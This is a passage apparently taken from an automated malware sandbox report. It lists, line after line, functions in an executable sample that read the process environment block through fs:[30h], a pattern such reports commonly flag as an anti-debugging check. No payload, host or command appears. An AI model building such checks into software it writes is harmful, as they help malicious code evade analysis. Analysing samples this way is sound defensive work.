                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010107C3 mov eax, dword ptr fs:[00000030h]6_2_010107C3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9262C mov eax, dword ptr fs:[00000030h]6_2_00F9262C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC6620 mov eax, dword ptr fs:[00000030h]6_2_00FC6620
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC8620 mov eax, dword ptr fs:[00000030h]6_2_00FC8620
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FAE627 mov eax, dword ptr fs:[00000030h]6_2_00FAE627
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101E7E1 mov eax, dword ptr fs:[00000030h]6_2_0101E7E1
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2619 mov eax, dword ptr fs:[00000030h]6_2_00FD2619
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA260B mov eax, dword ptr fs:[00000030h]6_2_00FA260B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA260B mov eax, dword ptr fs:[00000030h]6_2_00FA260B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA260B mov eax, dword ptr fs:[00000030h]6_2_00FA260B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA260B mov eax, dword ptr fs:[00000030h]6_2_00FA260B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA260B mov eax, dword ptr fs:[00000030h]6_2_00FA260B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA260B mov eax, dword ptr fs:[00000030h]6_2_00FA260B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA260B mov eax, dword ptr fs:[00000030h]6_2_00FA260B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F947FB mov eax, dword ptr fs:[00000030h]6_2_00F947FB
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F947FB mov eax, dword ptr fs:[00000030h]6_2_00F947FB
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E609 mov eax, dword ptr fs:[00000030h]6_2_0100E609
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB27ED mov eax, dword ptr fs:[00000030h]6_2_00FB27ED
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB27ED mov eax, dword ptr fs:[00000030h]6_2_00FB27ED
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB27ED mov eax, dword ptr fs:[00000030h]6_2_00FB27ED
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9C7C0 mov eax, dword ptr fs:[00000030h]6_2_00F9C7C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F907AF mov eax, dword ptr fs:[00000030h]6_2_00F907AF
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105866E mov eax, dword ptr fs:[00000030h]6_2_0105866E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105866E mov eax, dword ptr fs:[00000030h]6_2_0105866E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F98770 mov eax, dword ptr fs:[00000030h]6_2_00F98770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F90750 mov eax, dword ptr fs:[00000030h]6_2_00F90750
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2750 mov eax, dword ptr fs:[00000030h]6_2_00FD2750
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2750 mov eax, dword ptr fs:[00000030h]6_2_00FD2750
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC674D mov esi, dword ptr fs:[00000030h]6_2_00FC674D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC674D mov eax, dword ptr fs:[00000030h]6_2_00FC674D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC674D mov eax, dword ptr fs:[00000030h]6_2_00FC674D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC273C mov eax, dword ptr fs:[00000030h]6_2_00FC273C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC273C mov ecx, dword ptr fs:[00000030h]6_2_00FC273C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC273C mov eax, dword ptr fs:[00000030h]6_2_00FC273C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCC720 mov eax, dword ptr fs:[00000030h]6_2_00FCC720
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCC720 mov eax, dword ptr fs:[00000030h]6_2_00FCC720
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F90710 mov eax, dword ptr fs:[00000030h]6_2_00F90710
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC0710 mov eax, dword ptr fs:[00000030h]6_2_00FC0710
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010106F1 mov eax, dword ptr fs:[00000030h]6_2_010106F1
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010106F1 mov eax, dword ptr fs:[00000030h]6_2_010106F1
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E6F2 mov eax, dword ptr fs:[00000030h]6_2_0100E6F2
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E6F2 mov eax, dword ptr fs:[00000030h]6_2_0100E6F2
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E6F2 mov eax, dword ptr fs:[00000030h]6_2_0100E6F2
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E6F2 mov eax, dword ptr fs:[00000030h]6_2_0100E6F2
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCC700 mov eax, dword ptr fs:[00000030h]6_2_00FCC700
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCC8F9 mov eax, dword ptr fs:[00000030h]6_2_00FCC8F9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCC8F9 mov eax, dword ptr fs:[00000030h]6_2_00FCC8F9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E908 mov eax, dword ptr fs:[00000030h]6_2_0100E908
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E908 mov eax, dword ptr fs:[00000030h]6_2_0100E908
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101C912 mov eax, dword ptr fs:[00000030h]6_2_0101C912
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0102892B mov eax, dword ptr fs:[00000030h]6_2_0102892B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101892A mov eax, dword ptr fs:[00000030h]6_2_0101892A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE8C0 mov eax, dword ptr fs:[00000030h]6_2_00FBE8C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01064940 mov eax, dword ptr fs:[00000030h]6_2_01064940
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01010946 mov eax, dword ptr fs:[00000030h]6_2_01010946
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01034978 mov eax, dword ptr fs:[00000030h]6_2_01034978
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01034978 mov eax, dword ptr fs:[00000030h]6_2_01034978
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101C97C mov eax, dword ptr fs:[00000030h]6_2_0101C97C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F90887 mov eax, dword ptr fs:[00000030h]6_2_00F90887
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F94859 mov eax, dword ptr fs:[00000030h]6_2_00F94859
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F94859 mov eax, dword ptr fs:[00000030h]6_2_00F94859
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC0854 mov eax, dword ptr fs:[00000030h]6_2_00FC0854
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010189B3 mov esi, dword ptr fs:[00000030h]6_2_010189B3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010189B3 mov eax, dword ptr fs:[00000030h]6_2_010189B3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010189B3 mov eax, dword ptr fs:[00000030h]6_2_010189B3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA2840 mov ecx, dword ptr fs:[00000030h]6_2_00FA2840
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010269C0 mov eax, dword ptr fs:[00000030h]6_2_010269C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA830 mov eax, dword ptr fs:[00000030h]6_2_00FCA830
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB2835 mov eax, dword ptr fs:[00000030h]6_2_00FB2835
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB2835 mov eax, dword ptr fs:[00000030h]6_2_00FB2835
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB2835 mov eax, dword ptr fs:[00000030h]6_2_00FB2835
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB2835 mov ecx, dword ptr fs:[00000030h]6_2_00FB2835
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB2835 mov eax, dword ptr fs:[00000030h]6_2_00FB2835
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB2835 mov eax, dword ptr fs:[00000030h]6_2_00FB2835
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105A9D3 mov eax, dword ptr fs:[00000030h]6_2_0105A9D3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101E9E0 mov eax, dword ptr fs:[00000030h]6_2_0101E9E0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC29F9 mov eax, dword ptr fs:[00000030h]6_2_00FC29F9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC29F9 mov eax, dword ptr fs:[00000030h]6_2_00FC29F9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101C810 mov eax, dword ptr fs:[00000030h]6_2_0101C810
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]6_2_00F9A9D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]6_2_00F9A9D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]6_2_00F9A9D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]6_2_00F9A9D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]6_2_00F9A9D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]6_2_00F9A9D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC49D0 mov eax, dword ptr fs:[00000030h]6_2_00FC49D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103483A mov eax, dword ptr fs:[00000030h]6_2_0103483A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103483A mov eax, dword ptr fs:[00000030h]6_2_0103483A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F909AD mov eax, dword ptr fs:[00000030h]6_2_00F909AD
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F909AD mov eax, dword ptr fs:[00000030h]6_2_00F909AD
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01026870 mov eax, dword ptr fs:[00000030h]6_2_01026870
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01026870 mov eax, dword ptr fs:[00000030h]6_2_01026870
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101E872 mov eax, dword ptr fs:[00000030h]6_2_0101E872
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101E872 mov eax, dword ptr fs:[00000030h]6_2_0101E872
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD096E mov eax, dword ptr fs:[00000030h]6_2_00FD096E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD096E mov edx, dword ptr fs:[00000030h]6_2_00FD096E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD096E mov eax, dword ptr fs:[00000030h]6_2_00FD096E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB6962 mov eax, dword ptr fs:[00000030h]6_2_00FB6962
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB6962 mov eax, dword ptr fs:[00000030h]6_2_00FB6962
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB6962 mov eax, dword ptr fs:[00000030h]6_2_00FB6962
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101C89D mov eax, dword ptr fs:[00000030h]6_2_0101C89D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010608C0 mov eax, dword ptr fs:[00000030h]6_2_010608C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F88918 mov eax, dword ptr fs:[00000030h]6_2_00F88918
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F88918 mov eax, dword ptr fs:[00000030h]6_2_00F88918
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105A8E4 mov eax, dword ptr fs:[00000030h]6_2_0105A8E4
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01064B00 mov eax, dword ptr fs:[00000030h]6_2_01064B00
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCAAEE mov eax, dword ptr fs:[00000030h]6_2_00FCAAEE
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCAAEE mov eax, dword ptr fs:[00000030h]6_2_00FCAAEE
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100EB1D mov eax, dword ptr fs:[00000030h]6_2_0100EB1D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100EB1D mov eax, dword ptr fs:[00000030h]6_2_0100EB1D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100EB1D mov eax, dword ptr fs:[00000030h]6_2_0100EB1D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100EB1D mov eax, dword ptr fs:[00000030h]6_2_0100EB1D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100EB1D mov eax, dword ptr fs:[00000030h]6_2_0100EB1D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100EB1D mov eax, dword ptr fs:[00000030h]6_2_0100EB1D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100EB1D mov eax, dword ptr fs:[00000030h]6_2_0100EB1D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100EB1D mov eax, dword ptr fs:[00000030h]6_2_0100EB1D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100EB1D mov eax, dword ptr fs:[00000030h]6_2_0100EB1D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F90AD0 mov eax, dword ptr fs:[00000030h]6_2_00F90AD0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC4AD0 mov eax, dword ptr fs:[00000030h]6_2_00FC4AD0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC4AD0 mov eax, dword ptr fs:[00000030h]6_2_00FC4AD0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01058B28 mov eax, dword ptr fs:[00000030h]6_2_01058B28
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01058B28 mov eax, dword ptr fs:[00000030h]6_2_01058B28
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FE6ACC mov eax, dword ptr fs:[00000030h]6_2_00FE6ACC
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FE6ACC mov eax, dword ptr fs:[00000030h]6_2_00FE6ACC
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FE6ACC mov eax, dword ptr fs:[00000030h]6_2_00FE6ACC
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01038B42 mov eax, dword ptr fs:[00000030h]6_2_01038B42
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01026B40 mov eax, dword ptr fs:[00000030h]6_2_01026B40
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01026B40 mov eax, dword ptr fs:[00000030h]6_2_01026B40
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105AB40 mov eax, dword ptr fs:[00000030h]6_2_0105AB40
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01044B4B mov eax, dword ptr fs:[00000030h]6_2_01044B4B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01044B4B mov eax, dword ptr fs:[00000030h]6_2_01044B4B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01062B57 mov eax, dword ptr fs:[00000030h]6_2_01062B57
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01062B57 mov eax, dword ptr fs:[00000030h]6_2_01062B57
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01062B57 mov eax, dword ptr fs:[00000030h]6_2_01062B57
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01062B57 mov eax, dword ptr fs:[00000030h]6_2_01062B57
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103EB50 mov eax, dword ptr fs:[00000030h]6_2_0103EB50
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F98AA0 mov eax, dword ptr fs:[00000030h]6_2_00F98AA0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F98AA0 mov eax, dword ptr fs:[00000030h]6_2_00F98AA0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FE6AA4 mov eax, dword ptr fs:[00000030h]6_2_00FE6AA4
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC8A90 mov edx, dword ptr fs:[00000030h]6_2_00FC8A90
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9EA80 mov eax, dword ptr fs:[00000030h]6_2_00F9EA80
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9EA80 mov eax, dword ptr fs:[00000030h]6_2_00F9EA80
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9EA80 mov eax, dword ptr fs:[00000030h]6_2_00F9EA80
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9EA80 mov eax, dword ptr fs:[00000030h]6_2_00F9EA80
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9EA80 mov eax, dword ptr fs:[00000030h]6_2_00F9EA80
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9EA80 mov eax, dword ptr fs:[00000030h]6_2_00F9EA80
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9EA80 mov eax, dword ptr fs:[00000030h]6_2_00F9EA80
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9EA80 mov eax, dword ptr fs:[00000030h]6_2_00F9EA80
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9EA80 mov eax, dword ptr fs:[00000030h]6_2_00F9EA80
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCCA6F mov eax, dword ptr fs:[00000030h]6_2_00FCCA6F
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCCA6F mov eax, dword ptr fs:[00000030h]6_2_00FCCA6F
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCCA6F mov eax, dword ptr fs:[00000030h]6_2_00FCCA6F
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0A5B mov eax, dword ptr fs:[00000030h]6_2_00FA0A5B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0A5B mov eax, dword ptr fs:[00000030h]6_2_00FA0A5B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F96A50 mov eax, dword ptr fs:[00000030h]6_2_00F96A50
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F96A50 mov eax, dword ptr fs:[00000030h]6_2_00F96A50
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F96A50 mov eax, dword ptr fs:[00000030h]6_2_00F96A50
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F96A50 mov eax, dword ptr fs:[00000030h]6_2_00F96A50
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F96A50 mov eax, dword ptr fs:[00000030h]6_2_00F96A50
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F96A50 mov eax, dword ptr fs:[00000030h]6_2_00F96A50
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F96A50 mov eax, dword ptr fs:[00000030h]6_2_00F96A50
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01044BB0 mov eax, dword ptr fs:[00000030h]6_2_01044BB0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01044BB0 mov eax, dword ptr fs:[00000030h]6_2_01044BB0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCCA38 mov eax, dword ptr fs:[00000030h]6_2_00FCCA38
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB4A35 mov eax, dword ptr fs:[00000030h]6_2_00FB4A35
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB4A35 mov eax, dword ptr fs:[00000030h]6_2_00FB4A35
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103EBD0 mov eax, dword ptr fs:[00000030h]6_2_0103EBD0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBEA2E mov eax, dword ptr fs:[00000030h]6_2_00FBEA2E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCCA24 mov eax, dword ptr fs:[00000030h]6_2_00FCCA24
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101CBF0 mov eax, dword ptr fs:[00000030h]6_2_0101CBF0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBEBFC mov eax, dword ptr fs:[00000030h]6_2_00FBEBFC
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F98BF0 mov eax, dword ptr fs:[00000030h]6_2_00F98BF0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F98BF0 mov eax, dword ptr fs:[00000030h]6_2_00F98BF0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F98BF0 mov eax, dword ptr fs:[00000030h]6_2_00F98BF0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101CA11 mov eax, dword ptr fs:[00000030h]6_2_0101CA11
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB0BCB mov eax, dword ptr fs:[00000030h]6_2_00FB0BCB
